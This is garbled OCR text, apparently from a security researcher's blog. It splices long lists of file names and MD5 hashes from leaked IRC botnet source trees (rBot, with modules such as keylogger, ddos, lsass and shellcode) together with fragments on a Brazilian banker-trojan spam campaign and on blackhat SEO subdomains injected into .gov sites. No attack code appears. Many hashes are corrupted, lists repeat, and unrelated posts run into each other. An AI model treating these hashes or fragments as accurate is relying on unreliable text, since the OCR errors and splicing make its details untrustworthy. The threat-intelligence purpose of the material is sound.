76c9ea8f8599127d4380c2ab2d8e8d58 
socks4.h 27813161ff3e382d5c52de548055abd0 
sysinfo.cpp 
Oedb97ddbbe6daea8c1d51886d99e4be 
sysinfo.h 
4c2cb8083fdce60392166ed6e7el1ec56 
tcpip.h 
8f60f0a581dd79a83e676cb4d2f3d96F 
tftpd.cpp 
62b3697e07ace85d61b70edbeab64ff8 
tftpd.h 
60796d8caa8fadebaef4ed91ccaf9eeb 
threads.cpp 
265359d3d01e0ad0f879e280eab6cfa32 
threads.h 
4eb3ef7c1473585a5287d79f015fda6d 
visit.cpp 
db26d171a670c33783ac24afdbcc7b4a 
visit. 
3d80a838469fa619ae88220cf23246ae 
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Trojan.PWS.Banker 

Result: 13/32 (40.63 %) 

File size: 2505216 bytes 

MD5: 1bdb0d3e13b93c76e50b93dbladeed3e 

SHA1: f472693da81202f4322425b952ecO2cbff8d72bc 


The campaign was originally spoammed with the messages : "Chegou 1 vivo foto torpedo" and 
"Vivo torpedo foi enviado de um celular para seu e" by using the web based spammer you can 
see in the attached screenshot. 


More info about [5]banking malware, comments on a recently advertised [6]metaphisher 
malware kit with banker trojans infected hosts only showcasing the [7]malicious economies of 
scale botnet masters mentality, as well as [8]related posts on [9]targeted malware [10 ]attacks. 


. http://seclists.org/fulldisclosure/2007/0ct/0892.htm 


ttp://ddanchev.blogspot.com/2007/07/sql-injection-through-search-engines .htm 


ttp://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=TROJ_BANLOAD.BF 


1 
2 
3: 
4 

5. 
6 

7 

8 

9 


ttp://ddanchev.blogspot.com/2007/11/metaphisher-malware-kit-spotted-in-wild.htm 


. http://ddanchev. blogspot .com/2007/03/underground-economys-supply-of-goods.htm 
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. http: //ddanchev. blogspot. com/2007/09/infecting-terrorist-suspects-with.htm 
10. http://ddanchev. blogspot .com/2007/07/targeted-extortion-attacks-at .htm 
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wildcard.cpp 
751588175be42e8ec1f89622a0191205 
wildcard.h 
fcb3b8307e81c264c031d92ea3lefa82 
encrypt.exe 
7d400a514eebececabc78541fe5cb5e4 
reptile.txt 
9d4b0252138c69c59720d95f9ec121f7 
advscan.cpp 
d5d7cf56e09558fd86al14db494bf0d36 
advscan.h 
47250702c804cca7305c35b985287517 
aliaslog.cpp 
e57fe93e071535560a6f27d3d3010662 
aliaslog.h 
48d113ef65ed247ac717d285b8ca6da6 
autostart.cpp 
13329a3fd3974d4cada1699d76e4d001 
autostart.h 
d633db695b9352ac3b9d2c9e49c4ddb3 
avirus.cpp 
11c6f4a3485ac12901181b3d17799619 


avirus.h a14828f26c61c3dac7fd62769b03443a 


CleanUp.bat 
d313b8c4c90f71b18e6e6d597bf54188 
configs.h 
0a5d50b66340d8ddd4f76db2ca482ab6 
crc32.cpp 
2e526b97alcdaa4ca7e1f99764cfd800 
crc32.h 
40d778dd0c3e677bdc947b450d645040 
crypt.cpp 
c2ab02a4e6aa531be5d17f82df9d7f04 
crypt.h 
94cf8bdfd3ebac5deed772dc1a5482b8 
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dcc.cpp 
0d87baf7c79f776301b57643d0af8db4 
dcc.h 
b02e212c4fa387f8c636a6e586add440 
ddos.cpp ed0c9b5120f45a2ccb3572139a7d0061 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
1896b57c023ae68ecf44b1e46e03e820 
download.cpp 
543216af810adf7e8a5198ca77f50821 
download.h 
e56eab84ec5ef786fd5d3dedc887bebb 
driveinfo.cpp 
710621e9d484605ff8e86bd1e3791e28 
driveinfo.h 
dfce6aal1f76a846382b59608ddd95913 
ehandler.cpp 
fedbaQ0ebabf46e728f9b61a53b5fc4f3 
ehandler.h 
41f132e6d546f4d37fd0563aa7ae389a 
externs.h 
2dc271a0a609ce2a36d7eb4563cb84ef 
findfile.cpp 
342bfb372b919bcce25ec4e35b6d94a4 
findfile.h 
e€a10657590098411cd035895ee589e6d 
findpass.cpp 
9bbf412cde2e485f87472d93713f5545 
findpass.h 
dd88750e4804ee6ab6bed32aa4720cd5 
fphost.cpp 
e565e16d40629f73c4bffaa045a6d851 
fphost.h f9bce1c269b636b88a11d089119b1847 
ftpd.cpp 92d6d529b386a8c064130bd2f68cb49f 
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ftpd.h 
6d68ed40730d11a6754d88e637856d54 
functions.h 
59e6e3f68c215e77b06f641c7d9c7104 
globals.h 
45dbd0fa8999248ac80615c32199aa7a 
httpd.cpp 
081d5870a2059277762d5dee86cf89el 
httpd.h 
6f944ed7a027f812037f82571802b3c4 
ident.cpp 
d44bdb067c2b87ab05ale112dd92b60a 
ident.h 
f9ebfedfcf82a07f0dc07e6a3c9a5cb6 
includes.h 
639043a2f5952d3b1e84fc894b6ecc43 
irc send.cpp 
2ea3314614cc0ee7a0fd39fda4lee53a 
irc send.h 
ea862ef9c9314576991e5c8ede0ca795 
loaddlls.cpp 
7¢€46222429b54d46ac014b7edec162af 
loaddlls.h 
65ce88234be047bdb75df881b76a21ad 


misc.cpp 3e301bce794972dd8cc18af97aa4b010 


misc.h 
5cf93932a954af6d0ffaea67e47dbc9a 
ms04 007 asnl.cpp 
68e06b3ddef507d60f6baf148913f9a7 
ms04 _007 asnl.h 
32f84330ea3890cdbbfa930d056cbba2 
net.cpp 
16c95a093306df4b756a5af9d040189a 
net.h 
c6ee28eb922a6b5f037f6de9dac3bf5f 
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netbios.cpp 
bb17840f3dd290c5923c2ad4bc51c93d 
netbios.h 
dd155768799804528c6cd19d67df42a3 
netutils.cpp 
f16842c5fb4481e77e898a74390302d8 
netutils.h 
fdb3542433bd1835786694366d05ae24 
nicklist.h 
78f508a6d49bfa8d2bac45b5869ae252 
passwd.h ldda2a85a6a9f84fe5be96032e19b2b1 
pnp.cpp 
4f37ef02a31c1b2a71fc41e06624914d 
pnp.h 
a6ea8al2b4309238b675c82cc04c6438 
processes.cpp 
f01f11a23793c24e9ae5e5bd2ace35el 
processes.h 
75d3a2e5b4c60102c4d1137235845af0 
ProtX.ico 
4a43125e9e37241319b22eaa5421a0dd 
random.cpp 
998f6d203c7a0d73fb81e7da364005b5 
random.h 681177bf5b9dla6de4ea9b6b75d2e691 
recource.rc 
78c0409eb72214e8e4c5cb48a0086554d 
remotecmd.cpp 
b86784710722d6631943c9d0fef556e2 
remotecmd.h 
8fO0bfcd5cf226ccb5b3b42e9fe9392ee 
rlogind.cpp 
d87020bb5520b444e5a8ca91leee/f972 
rlogind.h 
00fad45253997ce226b2e1108326968a 
rndnick.cpp 
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d801b94a46d9271802f014fbaa3cec44 
rndnick.h 

6b3aeed93db47 7fd1c632e0fc4e17ce8 

ruff.cop a09ae609cbd3105850ed4c0e65elbec9 
ruff.dsp 447d03cc0O66eaa6e2bd6e6e3fde3d2a9 
ruff.dsw abbf049da74700dc1f07250818ad5cd1 
ruff.h 

7eea8d728afc70099b2585ab6ef82970b 

ruff.ncb 2a3f3de6287fa839110c1525beba7989 
ruff.opt a4d5fe092d7c64flb761a326b65bab94 
ruff.plg 6ebdf15a86c89158903af949fcf4b885 
scan.cpp 99033483dd03a356c91f9d360014f859 
scan.h 

5e707a00bfb3a06albde92467b410875 
secure.cpp 

52fdd75f82fe32897 79eaebffole5aa3 

secure.h ec43eaccd583e4917760029ef0485803 
session.cpp 
€67508d262e532dcb34974714883cbec 
session.h 

d0698e9f174ff465f22f5faf384978b5 
shellcode.cpp 
3aac7431685900b9cd178bfbdf2b0fba 
shellcode.h 
48196aa5ef87af3c34802c83bd1e5091 
socks4.cpp 
76c9ea8f8599127d4380c2ab2d8e8d58 
socks4.h 27813161ff3e382d5c52de548055abd0 
sysinfo.cpp 
Oedb97ddbbe6daea8c1d51886d99e4be 
sysinfo.h 
4c2cb8083fdce60392166ed6e7elec56 

tcpip.h 

8f60f0a581dd79a83e676cb4d2f3d96F 

tftpd.cpp 
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62b3697e07ace85d61b70edbeab64ff8 

tftpd.h 

60796d8caa8fadebaef4ed91ccaf9eeb 
threads.cpp 
265359d3d01e0ad0f879e280eab6cfa32 
threads.h 
4eb3ef7c1473585a5287d79f015fda6d 
visit.cpp 
db26d171a670c33783ac24afdbcc7b4a 

visit.h 

3d80a838469fa619ae88220cf23246ae 
wildcard.cpp 
751588175be42e8ec1f89622a0191205 
wildcard.h 
fcb3b8307e81c264c031d92ea31lefa82 
encrypt.exe 
7d400a514eebececabc78541fe5cb5e4 
reptile.txt 
9d4b0252138c69c59720d95f9ec121f7 
rBot.dsp 4ad3ab709e27dfc522c56e6f3c9d4a09 
rBot.dsw 37a2056d806c2c07d6a5e0ad7a9b75a0 
rBot.ncb bc8flea391flbdb878fc5f476468b111 
rBot.opt 864ec606429968db08043031182d7a79 
rBot.plg aecfe99730c3b24148d4df9a470e30d8 
advscan.h 
f3492751a194b23b17bf6529112a16b7 
aliaslog.h 
52307a78ef96b5920f5edc93785166c6 
authbypass.cpp 
cb1c6cb17ddel1c74d16e7737b606ffb6 
authbypass.h 

4995001 3afcac783cfc3e71cdf74efel 
autostart.h 
ce33622adfc7b6e1543361c2a206229f 
configs.h 
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80f49decb6f0dd334d878d0f152844ac 
crc32.h 
lcd0adeb14bdd0dcbc3fe66a5fe2fed9 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
97ada46ed84b285cacc5fllc7ee206de 
download.h 
772d831e6b39c79d829d9fc8cdb713a6 
driveinfo.h 
8f57049be20497bca61df57618ba9cfe 
ehandler.h 
3644e5ec559d2670426689d1c80b0509 
externs.h 
6736f17c2ale2ad02869928e3b15783c 
fphost.h 72b9b3d4234fcbc5da07695ae3483c1b 
ftpd.h 
48a891506c957340b207b627105d7bb4 
functions.h 
000d108172efd4ble8a4af8a60cal7de 
globals.h 
65ad95c53b660b0fc4bad98f2d2d4b22 
httpd.h 
288553599c70aa95ec2119d78938578a 
icmpflood.h 
4462c6318220648820316848deb124fd 
ident.h 
56c539d97aec2572f6fc9349edd7d9c2 
includes.h 
0844ae84794c2b2bc708d29f7484063e 
irc send.h 

30d0176a5e9b6e3e5al 9bfb1lfcda444c 
loaddlls.h 
4703f87679db3655151348076c41a83a 


misc.h 
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f035c1642a8e3ff49ff19bb1be316333 
ms05039-pnp.h 
c1676a1f6e2770c9c993ae2e13161c0b 
ms05039-win2k.h 
da47a260b3a9a377974f36232b471779 
netutils.h 
ccbb3172d63a28dae5a98af36c27e354 

New Text Document.txt 

nicklist.h 
e9eb7e67eb89f60039d17c3fc5609ab4 
ntpass.h 6cal6c9c9284cc07346a31bd6e07fea2 
pingudp.h 
b86f6921f7a720d6e7b204fbeb34e8d4 
processes.h 
f7c75cccfaaef0c459ac6c020cf6808d 

rBot.h 

6d17278915220464f9502b8ce5451f67 
redirect.h 
9e5349d6d6944a179b9ca7a7d847c335 
remotecmd.h 
1fb45492f87a66e34be6b4ca55b1cf86 
rndnick.h 
3cbe632d4ca6f152ca2a13bb1561d292 

scan.h 

6236be771c0c88df937f75845a064f12 
secure.h 231le3dd2ba09a8bbc039caf634e5306d 
skysyn.h c7d7710b27cce85f8bdea408945b238c 
socks4.h b103f307ffO2cd98fe2bfbecbd19c011 
synflood.h 
78df095c5aa59a0bfaa783e6edd38d0d 
sysinfo.h 
38774eadb5ba365df293ba4a222c4163 
tcpflood.h 
a9165cc828d623c51c297ec888803d9F 
tcpip.h 
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41b08a9fae20869c4eca0bae6dc2d971 
tftpd.h 
01a889b931f69e44f3a9421e16c327bc 
threads.h 
f16de170fe23839ccf32154d464ea5ff 
visit. 
766e4add98e2cb96bd37e87f4d9dfff9 
wildcard.h 
64fa15a50564415d397166c3d0aec0a6 
advscan.cpp 
b351594efd7d6792a5bbecff8695e8cd 
aliaslog.cpp 
5ab7456a9dc3ff9c5c1l02eebfe5c1c05 
authbypass.cpp 
eeef74f096fb004c84609440dbc3a6b5 
autostart.cpp 
9d6b9e0b182f0770c7e53371e209bd83 
crc32.cpp 
Ob6f74c90e143c321f7350eb5cec00d1 
download.cpp 
14f6fac91f34a06b3181d68bd2a65718 
driveinfo.cpp 
ehandler.cpp 
094d4e146ab0fd585b4215221ef7eb7d 
fphost.cpp 
e8a9f28bf65b1e2c9a97a44f0929e55a 
ftpd.cpp 548726d40c735a189cc9fc28ab02c753 
hideprocess.h 
bd5866066aa879cd561e7 7fc1f2285d5 
ident.cpp 
86f86f38b612931496b9c320288cef64 
irc send.cpp 
9672d756206d9a7f491d818645d4aca3 
loaddlls.cpp 
bc5436bdf839eaf41a387f82b6cbbdb6a 
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misc.cpp 479509e6c75a9831b0237136f2d4dfce 
ms05039-pnp.cpp 
34796289e62d55ae5ad80d86186a6fde 
ms05039-win2k.cpp 
cObdce1d9a6a4c5bc7b6e195331ac82b 
netapi.cpp 
82c063f07724598bdf7b83351beac983 
netapi.h 1ba40548a0732b0150550fff8c783004 
netutils.cpp 
21f345418cbd8cle2f79ce5915f7d2cb 

New Text Document.txt 

pingudp.cpp 
c2f52ef92337c6dbb652f1b176592138 
processes.cpp 
7f58d346f96db45112231ee3040cb6c8 
rBot.cpp 493d14d8ee7c38ab2117c0d80288ab86 
remotecmd.cpp 
bde3aa20cd9ab59d9d684207ed5a56ef 
rndnick.cpp 
41f9f470575c14c4a3289c2872e49e6c 
skysyn.cpp 
7cee67a8959acd9d020ca453800a1797 
synflood.cpp 
6a46fa9654dc5108415deb9910957f2c 
sysinfo.cpp 
81051bcc2cflbedf378224b0a93e2877 
tcpflood.cpp 
31fc35ce4a71253720df9275092e2bc0 
test.cpp 6c30df519c14dcbbfb20b53fed940499 
threads.cpp 
Ob0eb3afa0b104448d363c1467d1cc34 
visit.cpp 

wildcard.cpp 
83da79ca158b8aad9844d0c08ce2f71b 


advscan.cpp 
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Want prOn? Try [1].gov domains in general, ones that have been getting the attention of 
blackhat SEO-ers for a while, just like the most recent related cases where the [2]City of 
Chetek, Winsonsin, the City of Somerset, Texas and Town of Norwood, Massachusetts got their 
blackhat SEO injection. The previous attack is related to the one I'll assess in this post, the 
blackhat SEO tool is the same given the static subdomains generated, what remains to be 
answered is how they’ve managed to get access to the control panels of the domains in order 
to add the subdomains? Let’s look at the facts : 


- the targets in this attack are The Virgin Islands Housing Finance Authority (VIHFA), and the 
City Of Selma, Alabama 


- this is the second blackhat SEO operation uncovered during the past couple of months target- 
ing .gov domains 


- access to the control panels is somehow obtained so that subdomains pointing to 89.28.13.207 
(89-28-13-207.starnet.md) and 89.28.13.195 (89-28-13-195.starnet.md) are added at both do- 
mains 


- both .gov domains that are targets in this attack are using a shared hosting provider, meaning 
their IP reputation is in the hands of everyone else’s web activities responding under the same 
IP 
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9ala04ala7d2750acfa3cc2a47308c15 
advscan.h 
d5bfa343e80c04d15d6d7b5e9ce92eef 
aliaslog.cpp 
826a551d0689a4e0846977a91c5d0fe6 
aliaslog.h 
52307a78ef96b5920f5edc93785166c6 
autostart.cpp 
70bdd438884ef8a62bd24a7c416303f4 
autostart.h 
ce33622adfc7b6e1543361c2a206229f 
avirus.cpp 
15eae314484b841cc21e6698a504d175 
avirus.h e55a156d28fde56a0bb05fc599dafecf 
beagle.cpp 
45ca74ec0aa5d493533ea48bccc7f890 
beagle.h 76fa5d92efdffaadb93a416dc5ffbaf8 
capture.cpp 
8131417a0ade8b0cd43a6b1a441022dd 
capture.h 
1a27e95a9451b7b9fde4dd31labbe40c4 
cdkeys.cpp 
3f24656c7e76d36b031a0501f0df9693 
cdkeys.h 10199c0132621d0f86774ae3ea965f6c 
configs.h 
58900af64fbe3d0cb435fffcae19fb04 
crc32.cpp 
3771¢c5b3f6992c43c0e12a57c41a727e 
crc32.h 
lcdO0adeb14bdd0dcbc3fe66a5fe2fed9 
crypt.cpp 
f8d56522e7015cff349715794104c50f 
crypt.h 
Oe8cd32d6c5dbb0546c57d7fd213b365 


dameware.cpp 
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56c687fde3f816d647352c06717eb343 
dameware.h 
c5f45e22e790da8dd52d90dd4841b5c7 
dcc.cpp 
bc19d35982b17f731a59c62b1c14c84d 
dcc.h 
€44c57141c37593156064072bd6570c2 
dcom.cpp acea5e7fd1133f94c9e89756c5c0cc27 
dcom.h 
b2792e423f3ec732793723d53a0e12c8 
dcom2.cpp 
0ad20a541269c646caa86e8cef38d708 
dcom2.h 
€9548b20f8d3d955969a8b515b426db4 
ddos.cpp ed0c9b5120f45a2ccb3572139a7d0061 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
f5c7884269ab82f3039b7b442e73d47f 
download.cpp 

664845639 laff5fbob872236bcb0af8b5 
download.h 
772d831e6b39c79d829d9fc8cdb713a6 
driveinfo.cpp 
9dc1c0a866f906b262d258a8ca3eda9e 
driveinfo.h 
8f57049be20497bca61df57618ba9cfe 
dtc.cpp 
5443b8c8e7c630de43b7e7417c2a413c 
dtc.h 
505f93528c099eae29f724d9dc2e25b8 
ehandler.cpp 
7f85493a9bae6ab2dad717786502328c 
ehandler.h 


3644e5ec559d2670426689d1c80b0509 
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externs.h 
6efOd2ffff75a9b4aflbe7159d6fc26e 
findfile.cpp 
40273104f4bc7ebcd7f0b87673f39638 
findfile.h 
d21e9ef8155cf3c9efcbe8ec4244357a 
findpass.cpp 
21f63de47f8f0fdb9f989d6463a89032 
findpass.h 
1fecf202e0ebd30610d74f842979c82c 
fphost.cpp 
3b4e036a97dfabcd636e63245831853a 


fphost.h 7269b3d4234fcbc5da07695ae3483c1b 
ftpd.cpp e324aff6c71758273cbd995939898b1f 


ftpd.h 
48a891506c957340b207b627105d7bb4 
functions.h 
000d108172efd4ble8a4af8a60cal7de 
globals.h 
65ad95c53b660b0fc4bad98f2d2d4b22 
httpd.cpp 
3b321d4bdc50573e2722291788667763 
httpd.h 
288553599c70aa95ec2119d78938578a 
icmpflood.cpp 
5caa21a85ea20819ca40e7454f1l1lbe33 
icmpflood.h 
4462c6318220648820316848deb124fd 
ident.cpp 
9f22919c49284e257ce0ed79dbd29bf6 
ident.h 
56c539d97aec2572f6fc9349edd7d9c2 
iis5ssl.cpp 
faalede63e1249a98c042fd3f79cd8c2 
iis5ssl.h 
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c59eb88c83cff84e75a02897215ad2ce 
includes.h 
0cb384a4bf10818a3b8fe8da86f20105 
irc send.cpp 
6a084f0b44846cfbd50498b8b03687e3 
irc _send.h 

30d0176a5e9b6e3e5al 9bfb1fcda444c 
keylogger.cpp 

€569621c990b3 7affc9cf4b050f2df2e 
keylogger.h 
a00df900cf42e596e4c48e8a9d52afed 
kuang2.cpp 
ce5f0f4d470b760d2276fab309878420 
kuang2.h fc3343ecc92dba61f83260bbb93aa70c 
loaddlls.cpp 
1186093534flcfb47efd3e4e922c95d4 
loaddlls.h 
4703f87679db3655151348076c41a83a 
Isass.cpp 
3f78a873e03fcbal474ddelelbd125d0 
Isass.h 
5b9d615744a8d6f4b2c9c19d2aed46ef 
Isass2.cpp 
da0492a87b10a88baa09e7e8330b2a0b 
Isass2.h 17e0f879e4ce5667c271cf2df3d97af0 
misc.cpp 4770444fdc75d9baac93b3bc29bfa51f 
misc.h 
f035c1642a8e3ff49ff19bb1be316333 
ms04 007 _asnl.cpp 
d92c50cd6aab3adadd44d6ed3017973d 
ms04 _007 _asnl.h 
c18cb0ec17923a63653974cbfb1dlecb 
mssql.cpp 
2ea31bdb396d29250fd6fédbdf231433 
mssql.h 
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742394ed531laab2ecc958daf5305723e 
mydoom.cpp 
cfcbabd00798a130fe0366975a9a0f50 
mydoom.h c7d0eda136c75da543c4al14f9c28b7d6 
net.cpp 
a1193f36f9bc058f9306fa922b957ed9 
net.h 
b1bb95c11a47aa666acd9a5929861726 
netbios.cpp 
904a4d19d94ab75dbe67e628831c0ef9 
netbios.h 
dd155768799804528c6cd19d67df42a3 
netdevil.cpp 
892dd8fd4a08ede457f9346b5edd832e 
netdevil.h 
a89982a588e965ce01448c60a81585b3 
netutils.cpp 
70€91597c24a39f15682b255dc78973d5 
netutils.h 
ccbb3172d63a28dae5a98af36c27e354 
nicklist.h 
e9eb7e67eb89f60039d17c3fc5609ab4 
optix.cpp 
5ab6d1017b7380586127050009bec5a9 
optix.h 
3421ea53b60d9533328808627b869ccc 
passwd.h c300d3b2a40113092a84186424b56079 
peer2peer.cpp 
7fa712db3241c69112b7a853516ff0f5 
peer2peer.h 
920cce5177elfcaacdf28ec4aalc18b1 
pingudp.cpp 
8092a2919dab44410b1802c1b31ddc7a 
pingudp.h 
b86f6921f7a720d6e7b204fbeb34e8d4 
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processes.cpp 
6ac678aaef/9bf7b4644c3eeaec45fb1 
processes.h 
f7c75cccfaaef0c459ac6c020cf6808d 

psniff.cpp 

c4eb189f05d2a7ff6e52afeOcdab3bd17 

psniff.h 5eebe93de4e03bf0bb118e35997743a9 
rBot.cpp 7e66b0791775f7564ecb2b1bd899bb30 
rBot.dsp e4fe3046084d05e03290af56aala3ce4 
rBot.dsw 37a2056d806c2c07d6a5e0ad7a9b75a0 
rBot.h 

6d17278915220464f9502b8ce5451f67 

rBot.ncb 1b615017ab6126cb2d0db015e6b36c5c6 
rBot.opt d6b24bea02bef69alael14f6bf854b2ef 
rBot.plg 095b8f814fc00a42af0377a25865a063 
redirect.cpp 
dacd372119ae0ab1750b3e2f83382a52 
redirect.h 
9e5349d6d6944a179b9ca7a7d847c335 
remotecmd.cpp 
35014f60da50aef7b6a7al19ff893247a 
remotecmd.h 
1fb45492f87a66e34be6b4ca55b1cf86 
reqbuf.bin 

2d8fe918744e0f97f435f973d2af0be4 
rlogind.cpp 
2f26ca25770b2f22201d40541b1d9d29 

rlogind.h 

dbc479f2720ba03cb946419fbef774e0 
rndnick.cpp 
1a2ca37350424ebc8ece807afa055b72 
rndnick.h 
3cbe632d4ca6f152ca2a13bb1561d292 
sasser.cpp 
1fbo775e0551413b6b3fdel79f818c4e5 
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scan.cpp 66cOcfe5563eb8191fda0d9a6781lacOf 
scan.h 

6236be771c0c88df937f75845a064f12 
secure.cpp 
0385d82f95182e40ed61329826da5934 
secure.h 231le3dd2ba09a8bbc039caf634e5306d 
session.cpp 
82e74c83142171a4998ca76b20b4177¢c 
session.h 
5f8c353634b560052a5ebee5ef27ae32 
shellcode.cpp 
b16b4f6éaaf8a8c11822c931dc84f77d4 
shellcode.h 
cal14f267b73bc867b075ca56f524d52e 
socks4.cpp 
7d9d022be20b4dca6a204f8c1e027dbb 
socks4.h b103f307ff02cd98fe2bfbecbd19c011 
sub7.cpp ab416250dc7c47a499f6dd28b99elac0 
sub7.h 

c60800f9fecb35bb27384594b46feb22 
synflood.cpp 
d860c99e49b7c19e49c61a21baf0f66b 
synflood.h 
78df095c5aa59a0bfaa783e6edd38d0d 
sysinfo.cpp 
17375b805605f717739a8085be3f21f3 
sysinfo.h 
38774eadb5ba365df293ba4a222c4163 
tcpflood.cpp 
dd12816e442003152d2f65d42ce7eeb8 
tcpflood.h 
a9165cc828d623c51c297ec888803d9f 
tcpflood2.cpp 
65eaf8f6e8c69ed36fd175cc89d1644f 
tcpflood2.h 
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f8307cc6251c3fce249a794314103804 
tcpip.h 
41b08a9fae20869c4eca0bae6dc2d971 
tftpd.cpp 
917efaff4c87cdc33c518a243ffed787 
tftpd.h 
01a889b931f69e44f3a9421e16c327bc 
threads.cpp 
cbe0ba8b50028430092c7f0e78841b71 
threads.h 
f1b57b9f58ff94af8d2adeec8e7839e6 
upnp.cpp 02d082807cbb76759600d516143a214b 
upnp.h 
6be3f6b1cfecla51673271021f67cab6 
veritas.cpp 
f6c979e5c15128821ac415d40a264653 
veritas.h 
ledc6600327d36f4e0c2089c8fa23e7a 
visit.cpp 
27fb4f513a944ba46a905c796bce0c81 
visit. 
766e4add98e2cb96bd37e87f4d9dfff9 
webdav.cpp 
3b0fb2d9a7499f1710ef4e7077858533 
webdav.h cblccbbb8ab3884e8e40ddb76a386bad 
wildcard.cpp 
8785f287656995d8621d455ac7e04ab7 
wildcard.h 
64fa15a50564415d397166c3d0aec0a6 
wkssvc.cpp 
90758d8ed4b35cb0f21a8638ab3b9b94 
wkssvc.h 40cbf340990988e1214bc77e02d2ad93 
workstation.cpp 
2823dd8a969c824d91329a79385195db 
workstation.h 
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d16ef3f05e153e67803fba8d67532dal 
advscan.cpp 
b50a5b6585d66d156184d1a86c9ffbfd 
advscan.h 
d5bfa343e80c04d15d6d7b5e9ce92eef 
aliaslog.cpp 
826a551d0689a4e0846977a91c5d0fe6 
aliaslog.h 
52307a78ef96b5920f5edc93785166c6 
autostart.cpp 
70bdd438884ef8a62bd24a7c416303f4 
autostart.h 
ce33622adfc7b6e1543361c2a206229f 
avirus.cpp 
15eae314484b841cc21e6698a504d175 
avirus.h e55a156d28fde56a0bb05fc599dafecf 
capture.cpp 
8131417a0ade8b0cd43a6b1a441022dd 
capture.h 
1a27e95a9451b7b9fde4dd31labbe40c4 
cdkeys.cpp 
3f24656c7e76d36b031a0501f0df9693 
cdkeys.h 10199c0132621d0f86774ae3ea965f6c 
configs.h 
69c476987459336dc47d8d24c90f4800 
crc32.cpp 
3771¢c5b3f6992c43c0e12a57c41a727e 
crc32.h 
lcdO0adeb14bdd0dcbc3fe66a5fe2fed9 
crypt.cpp 
f8d56522e7015cff349715794104c50f 
crypt.h 
Oe8cd32d6c5dbb0546c57d7fd213b365 
dcass.cpp 
9ee06759e2825alca0fc3aa004057eec 
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dcass.h 
717dca288c88619445df69d3cbc0e855 
dcc.cpp 
bc19d35982b17f731a59c62b1c14c84d 
dcc.h 
e€44c57141c37593156064072bd6570c2 
dcom.cpp 2262ea03ec74e3b10b428e2d114e589b 
dcom.h 
b2792e423f3ec732793723d53a0e12c8 
ddos.cpp ed0c9b5120f45a2ccb3572139a7d0061 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
c7218b48fbe0425baa666dc891535d31 
download.cpp 

664845639 1laff5fob872236bcb0af8b5 
download.h 
772d831e6b39c79d829d9fc8cdb713a6 
driveinfo.cpp 
9dc1c0a866f906b262d258a8ca3eda9e 
driveinfo.h 
8f57049be20497bca61df57618ba9cfe 
ehandler.cpp 
7f85493a9bae6ab2dad717786502328c 
ehandler.h 
3644e5ec559d2670426689d1c80b0509 
externs.h 

6efOd2ffff7 5a9b4aflbe7159d6fc26e 
findfile.cpp 
40273104f4bc7ebcd7f0b87673f39638 
findfile.h 
d21e9ef8155cf3c9efcbe8ec4244357a 
findpass.cpp 
21f63de47f8f0fdb9f989d6463a89032 
findpass.h 
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- no malware is served in this incident, compared to [3]the previous one, a combination of 
malware and blackhat SEO 


Subdomains at City of Selma currently hosting around 9000 blackhat SEO pages : 


starnet.md 


o 


elma-al.gov 
.selma-al.gov 


co oO 


tarnet.md 
arnet.md 
starnet.md 
starnet.md 
starnet.md 8, selma-al.gov 
arnet.md n elma-al.gov 
arnet.md 30.selma-al.gov 
arnet.md selma-al.gov 


arnet.md 2,selma-al.gov 


arnet.md 33.selma-al.gov 


arnet.md m34¢,.selma-al.gov 


m21.selma-al.gov 
m22.selma-al.gov 
m23.selma-al.gov 
m24.selma-al.gov 
m25.selma-al.gov 
m26.selma-al.gov 
m27.selma-al.gov 
m28.selma-al.gov 
m29.selma-al.gov 
m30.selma-al.gov 
m31.selma-al.gov 
m32.selma-al.gov 
m33.selma-al.gov 
m34.selma-al.gov 
Subdomains at the Virgin Islands Housing Finance Authority with constantly changing structure 


.starnet.md 
3-195, starnet.md 
-195, starnet.md 
3-195, starnet.md 


starnet.md 


starnet.md 


-195, starnet.md 
~195,starnet.md 


starnet.md 


oO oO 


35, starnet.md 


co 
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1lfecf202e0ebd30610d74f842979c82c 
fphost.cpp 
3b4e036a97dfabcd636e63245831853a 
fphost.h 7269b3d4234fcbc5da07695ae3483cl1b 
ftpd.cpp c065b5a9638115729cc01613e48338c9 
ftpd.h 
48a891506c957340b207b627105d7bb4 
functions.h 
000d108172efd4ble8a4af8a60cal7de 
globals.h 
65ad95c53b660b0fc4bad98f2d2d4b22 
httpd.cpp 
3b321d4bdc50573e2722291788667763 
httpd.h 
288553599c70aa95ec2119d78938578a 
icmpflood.cpp 
5caa21a85ea20819ca40e7454f1llbe33 
icmpflood.h 
4462c6318220648820316848deb124fd 
ident.cpp 
9f22919c49284e257ce0ed79dbd29bf6 
ident.h 
56c539d97aec2572f6fc9349edd7d9c2 
includes.h 
€2598e0c09c15c633762290Ff70f498fd 
irc send.cpp 
6a084f0b44846cfbd50498b8b03687e3 
irc send.h 

30d0176a5e9b6e3e5al 9bfb1lfcda444c 
keylogger.cpp 

€569621c990b3 7affc9cf4b050f2df2e 
keylogger.h 
a00df900cf42e596e4c48e8a9d52afed 
loaddlls.cpp 
1186093534flcfb47efd3e4e922c95d4 
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loaddlls.h 
4703f87679db3655151348076c41a83a 
Isass.cpp 
b3d86a63eaa512289f087475faeaabd3 

Isass.h 

5b9d615744a8d6f4b2c9c19d2aed46ef 
Isass2.cpp 
da0492a87b10a88baa09e7e8330b2a0b 
Isass2.h 17e0f879e4ce5667c271cf2df3d97af0 
massasn.cpp 
858320bf874c5e0929597e721db2db51 
massasn.h 
9218d5e2b737c35a45d79a7d3907658a 
misc.cpp 4770444fdc75d9baac93b3bc29bfa51f 
misc.h 

f035c1642a8e3ff49ff19bb1be316333 

ms04 007 asnl.cpp 
8563b5de5c0e99c3dfdeca6cb89eaa67 

ms04 _007 _asnl.h 
c18cb0ec17923a63653974cbfb1dlecb 
net.cpp 

a1193f36f9bc058f9306fa922b957ed9 

net.h 

b1bb95c11a47aa666acd9a5929861726 
netapi.cpp 
767¢2b620c022d6146937baa51ffa4ac5 
netapi.h 6300dc4bf60d997941ef5627f284f526 
netutils.cpp 
7¢091597c24a39f15682b255dc78973d5 
netutils.h 
ccbb3172d63a28dae5a98af36c27e354 
nicklist.h 
e9eb7e67eb89f60039d17c3fc5609ab4 
passwd.h c300d3b2a40113092a84186424b56079 
pingudp.cpp 
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8092a2919dab44410b1802c1b31ddc7a 
pingudp.h 
